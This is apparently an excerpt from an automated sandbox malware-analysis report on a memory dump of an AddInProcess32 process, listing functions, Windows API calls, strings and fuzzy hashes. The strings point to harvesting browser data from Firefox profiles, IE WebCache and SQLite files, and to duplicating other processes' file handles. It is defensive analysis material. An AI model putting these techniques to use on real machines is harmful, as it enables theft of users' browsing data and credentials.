                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                  • String ID: $0.@
                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                  Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 2941347001-0
                                                                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                  • API String ID: 3249829328-1174173950
                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                  Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 669240632-0
                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                  • String ID: "%s"
                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                  Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 2911713577-0
                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp
                                                                                                  • String ID: @ $SQLite format 3
                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                  • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                  • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                  Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                  • API String ID: 2705122986-2036018995
                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpqsort
                                                                                                  • String ID: /nosort$/sort
                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Strings
                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                  • API String ID: 3354267031-2114579845
                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                  • String ID:
                                                                                                  • API String ID: 3473537107-0
                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                  Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@DeleteObject
                                                                                                  • String ID: r!A
                                                                                                  • API String ID: 1103273653-628097481
                                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1033339047-0
                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$memcmp
                                                                                                  • String ID: $$8
                                                                                                  • API String ID: 2808797137-435121686
                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
